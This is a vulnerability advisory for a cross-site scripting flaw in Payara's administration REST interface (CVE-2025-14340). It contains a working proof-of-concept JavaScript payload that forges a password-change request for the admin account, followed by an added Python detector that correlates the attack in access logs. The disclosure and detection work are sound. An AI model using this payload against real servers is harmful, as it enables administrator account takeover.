# XSS to Admin account takeover (CVE-2025-14340)

A Cross-Site Scripting vulnerability in Payara’s Administration REST Interface allows execution of attacker-controlled JavaScript, leading to admin account takeover. The chain works because:

1. The panel uses HTTP Basic Auth (credentials are sent automatically by the browser for same-origin requests).
2. The change-admin-password endpoint does not require the current password to update a user’s password.
3. The change-admin-password form does not have CSRF protection.
4. An injected script using the XSS in `/management/domain/version` can POST to `/management/domain/change-admin-password` and set an attacker-chosen password for any target account, resulting in administrator account takeover.

#### Proof of Concept

URL: `https://panel.example.com:4848/management/domain/version?<PAYLOAD>`

PAYLOAD:

```
<script>
fetch('/management/domain/change-admin-password', {
  method: 'POST',
  headers: {
    'X-Requested-By': 'GlassFish REST HTML interface',
    'Accept': 'text/html',
    'Content-Type': 'application/x-www-form-urlencoded'
  },
  body: 'id=admin&newpassword=P1234&password=P1234&__remove_empty_entries__=true&=change-admin-password'
});
</script>
```

## Legal

AUTHORIZED USE ONLY. DeepSecurity Perú does not endorse unauthorized access and takes no responsibility for any misuse of the information provided.
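As an added defensive example (not part of the advisory and not DeepSecurity Perú’s code), the Python script below shows how the chain described above leaves a trace in web-server access logs: a GET on `/management/domain/version` whose query string carries markup, followed shortly by a POST to `/management/domain/change-admin-password` from the same client address. The endpoint paths come from the advisory; the combined log format, the ten-minute window, and the sample log lines are assumptions constructed for this example.

```python
"""Added detection example (not from the advisory): correlates, in web-server
access logs, a reflected-markup request to the Payara admin REST 'version'
endpoint with a later password change from the same client address.

Assumptions: Apache/NGINX combined log format; endpoint paths as named in
the advisory; the log lines below are constructed, not captured traffic.
"""
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

VERSION_PATH = "/management/domain/version"
CHANGE_PW_PATH = "/management/domain/change-admin-password"

# Combined log format: client - authuser [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Fragments that have no business in a query string on this endpoint:
# an HTML tag opener, a javascript: URL, or an inline event handler.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]|javascript:|\bon[a-z]+\s*=", re.I)


def parse_time(value):
    """Parse the bracketed timestamp of a combined-format log line."""
    return datetime.strptime(value, "%d/%b/%Y:%H:%M:%S %z")


def classify(line):
    """Return an event dict for a line of interest, or None.

    kind == "xss_attempt":     GET on the version endpoint with markup in the query
    kind == "password_change": POST on the change-admin-password endpoint
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    event = {
        "ip": m.group("ip"),
        "user": m.group("user"),
        "time": parse_time(m.group("time")),
        "status": int(m.group("status")),
    }
    # Decode percent-encoding so "%3Cscript%3E" is inspected as "<script>".
    if path == VERSION_PATH and MARKUP_RE.search(unquote(query)):
        event["kind"] = "xss_attempt"
        return event
    if path == CHANGE_PW_PATH and m.group("method").upper() == "POST":
        event["kind"] = "password_change"
        return event
    return None


def correlate(lines, window=timedelta(minutes=10)):
    """Flag password changes that follow an XSS attempt from the same client.

    In the chain described in the advisory the payload runs in the victim
    admin's browser, so both the reflected GET and the forged POST arrive
    from the victim's address; that is why same-IP correlation is meaningful.
    """
    events = [e for e in (classify(line) for line in lines) if e]
    events.sort(key=lambda e: e["time"])
    last_xss = {}
    alerts = []
    for e in events:
        if e["kind"] == "xss_attempt":
            last_xss[e["ip"]] = e["time"]
        elif e["kind"] == "password_change":
            seen = last_xss.get(e["ip"])
            if seen is not None and e["time"] - seen <= window:
                alerts.append({
                    "ip": e["ip"],
                    "user": e["user"],
                    "xss_at": seen,
                    "password_change_at": e["time"],
                })
    return alerts


# Constructed sample lines (not real traffic). Lines 1-2: the attack pattern
# from one client. Lines 3-4: a legitimate admin changing a password.
SAMPLE_LOG = [
    '203.0.113.5 - admin [10/Oct/2025:13:55:36 +0000] '
    '"GET /management/domain/version?%3Cscript%3Ex%3C%2Fscript%3E HTTP/1.1" 200 512',
    '203.0.113.5 - admin [10/Oct/2025:13:55:40 +0000] '
    '"POST /management/domain/change-admin-password HTTP/1.1" 200 128',
    '198.51.100.7 - admin [10/Oct/2025:09:00:00 +0000] '
    '"GET /management/domain/version HTTP/1.1" 200 512',
    '198.51.100.7 - admin [10/Oct/2025:09:05:00 +0000] '
    '"POST /management/domain/change-admin-password HTTP/1.1" 200 128',
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_LOG):
        print(alert)
```

A plain POST to the change-admin-password endpoint is not suspicious on its own, since that is how the REST HTML interface normally changes a password; the signal is the preceding reflected-markup GET from the same address. Run over the constructed sample, only the 203.0.113.5 pair is reported.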